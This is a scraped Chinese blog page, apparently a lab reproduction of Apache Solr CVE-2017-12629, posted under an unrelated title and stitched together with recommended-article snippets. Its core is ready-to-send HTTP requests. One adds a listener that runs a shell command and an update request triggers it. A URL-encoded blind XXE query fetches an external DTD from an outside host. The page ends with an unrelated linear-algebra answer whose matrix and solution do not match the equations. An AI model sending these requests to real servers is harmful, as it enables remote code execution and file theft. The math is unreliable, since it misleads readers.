java list%3ca%3e排序_Apache Solr 远程命令+XXE执行漏洞(CVE-2017-12629)

最新推荐文章于 2024-04-01 17:37:24 发布
最新推荐文章于 2024-04-01 17:37:24 发布
阅读量3.6k 收藏
点赞数
文章标签: java list%3ca%3e排序
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32512187/article/details/115071016
版权
这篇博客详细介绍了Apache Solr出现的命令执行漏洞,通过创建自定义监听器执行shell命令,展示了Blind XXE漏洞的原理,并演示了如何利用ErrorBasedXXE读取文件。同时,它强调了安全更新的重要性,以及防范此类漏洞的防护措施。
摘要由CSDN通过智能技术生成

Apache Solr 最近有出了个漏洞预警,先复习一下之前的漏洞 #命令执行 ##先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数

POST /solr/demo/config HTTP/1.1

Host: your-ip

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Length: 158

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

30fffc4607de05d3a3cd62629e90155a.png

##然后进行update操作,触发刚才添加的listener:

POST /solr/demo/update HTTP/1.1

Host: your-ip

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 15

[{"id":"test"}]

db1d46bdc419bbb39ccd9777a3385a57.png ##进入容器查看文件创建成功

4b268e68cd544fc24c3cde29175ffd9e.png

#XXE ##由于返回包中不包含我们传入的XML中的信息,所以这是一个Blind XXE漏洞,我们发送如下数据包(自行修改其中的XXE Payload):

GET /solr/demo/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F192.168.63.1%2FXXE%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1

Host: your-ip:8983

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

##利用Error Based XXE读取文件:(下图为借用)

d36a6c7cea352cea640d79a63acd8cd0.png

黄衔
关注
XXE漏洞利用技巧(XML注入):从XML到远程代码执行
墨痕诉清风的博客
10-12 4908
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)我们以存在 XXE 漏洞的服务器为我们探测内网的支点。...
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe)
qq_51577576的博客
12-11 842
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe) Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。
xxe的原理及利用
hackzkaq的博客
03-09 741
零基础学黑客,搜索公众号:白帽子左一 什么是xxe XML External Entity Injection 外部实体注入,该漏洞发生在应用程序解析XML输入时, 没有禁止外部实体的加载,导致可加载任意外部文件,造成文件读取、命令执行(有点极端)、内网端口扫描、攻击内网网站、发起dos攻击等危害。 什么是xml 一种标记语言,被设计用来传输和存储数据(html是用来显示数据): <?xml version="1.0" encoding="UTF-8"?> <person> &l
Web漏洞-XXE漏洞(详细)
Ays.Ie的博客
03-11 5679
该篇描述Web漏洞-XXE漏洞(详细)
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1576
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
codeql分析Alist的反射型xss漏洞 (CVE-2022-26533)
Wonderful
10-25 266
CVE-2022-26533 为alist v2.0.10-v2.1.0中存在反射型XSS漏洞,使用codeql进行分析.
Apache solr XML 实体注入漏洞CVE-2017-12629
weixin_45022281的博客
10-13 676
Apache solr XML 实体注入漏洞CVE-2017-12629漏洞描述: Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
sxr__nc的博客
04-19 4943
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
初岄的博客
07-26 1318
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
Spring RCE远程执行漏洞CVE-2022-22965)
tpaer的博客
10-18 2631
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞
Alist保姆级搭建教程
热门推荐
BG1230521的博客
03-27 2万+
Alist一个支持多种存储的文件列表程序,可以实现多种网盘挂载为硬盘,并可以挂载不限量的网络资源。重点:免费!
vulhub中Apache solr XML 实体注入漏洞复现(CVE-2017-12629
最新发布
yougexiaojiuguan的博客
04-01 768
漏洞复现过程的记录
Alist 常规问题汇总
little_K_c的博客
03-17 4259
(1)在Alist根目录下,先输入”cmd“,进入命令行窗口界面。再输入以下指令,自定义密码##"Your_New_PassWord" 是你要设置的具体的密码(2)在cmd命令行窗口输入”alist server“,启动Alist。(3)在浏览器输入”“,打开网页端,就可以使用啦。
XXE漏洞
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
ArrayList不安全案例!以及3种解决方案!!
qq_40823802的博客
08-02 936
public static void main(String[] args) { //1. List<String> list = new Vector<>(); //2. List<String> list = Collections.synchronizedList(new ArrayList...
Python中给删除列表元素可能存在的漏洞
liguandong
10-13 439
如下图所示,在python语言中存在的列表删除的漏洞,先设定一个alist=[11,22,33,44]列表,当删除22或者33时,这两个列表元素是相邻的,会发现只删除了33,而未删除44,这是很奇怪的,因为33被删除之后,33的位置被44所取代,列表在循环时会自动跳动44的位置,以至于44未被删除,这是python语言本身的一个问题,只要不是相邻元素的删除,都不会出现这个问题的。
会捷通云视讯 list 目录文件泄露漏洞
BeWorthyOf的博客
11-23 3107
北京中创视讯科技有限公司 会捷通云视讯 存在目录遍历漏洞
Arrays.asList方法的漏洞
lihappyangel的专栏
07-05 810
1. Arrays.asList方法没有办法remove元素。 java提供了Arrays.asList方法来讲array转换成list,也提供了List.toArray方法来讲list转换为Array。来说说我在使用过程中碰到的问题。友盟分享时: 1 2 SHARE_MEDIA platformArray[] = {SHARE_MEDIA.QQ
Apache Solr 远程命令+XXE执行漏洞CVE-2017-12629
ddr12231的博客
08-09 729
Apache Solr 最近有出了个漏洞预警,先复习一下之前的漏洞 命令执行 先创建一个listener,其中设置exe的值为我们想执行命令,args的值是命令参数 POST /solr/demo/config HTTP/1.1 Host: your-ip Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatib...
求下列齐次线性方程组的一个基础解系与通解2a+3b+4c-3d-4e=0;a+2b+c-d-3e=0;3a+7b+c-2d-11e=0;;2a+4b+2c-2d-6e=0
05-25
我们可以将方程组表示为增广矩阵的形式: $$\left[\begin{matrix}0 & 2 & 3 & 4 & -3 & -4\\1 & 2 & 1 & -1 & -3 & 0\\3 & 7 & 1 & -2 & -11 & 0\\2 & 4 & 2 & -2 & -6 & 0\end{matrix}\right]$$ 然后,对该矩阵进行行变换,得到它的行简化阶梯形式: $$\left[\begin{matrix}1 & 2 & 1 & -1 & -3 & 0\\0 & 1 & 1 & 2 & -1 & 0\\0 & 0 & 0 & 0 & 0 & 0\\0 & 0 & 0 & 0 & 0 & 0\end{matrix}\right]$$ 我们可以发现,前两行构成一个系数矩阵 $A$ 的一个秩为 $2$ 的矩阵,而后两行都是零,因此该方程组的通解为: $$\left\{\begin{aligned}a &= -2s - t - 3u\\b &= -s - 2t + u\\c &= s - t\\d &= 2t\\e &= u\end{aligned}\right.$$ 其中 $s,t,u$ 是任意实数,这里我们可以取它们为 $1$,$0$,$0$,得到一个基础解系: $$\{\ (-2, -1, 1, 0, 0),\ (-1, -2, 0, 1, 0),\ (-3, 0, -1, 0, 1)\ \}$$ 因此,该方程组的通解为: $$\left\{\ a\cdot(-2, -1, 1, 0, 0) + b\cdot(-1, -2, 0, 1, 0) + c\cdot(-3, 0, -1, 0, 1)\ \middle|\ a,b,c\in\mathbb{R}\right\}$$
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值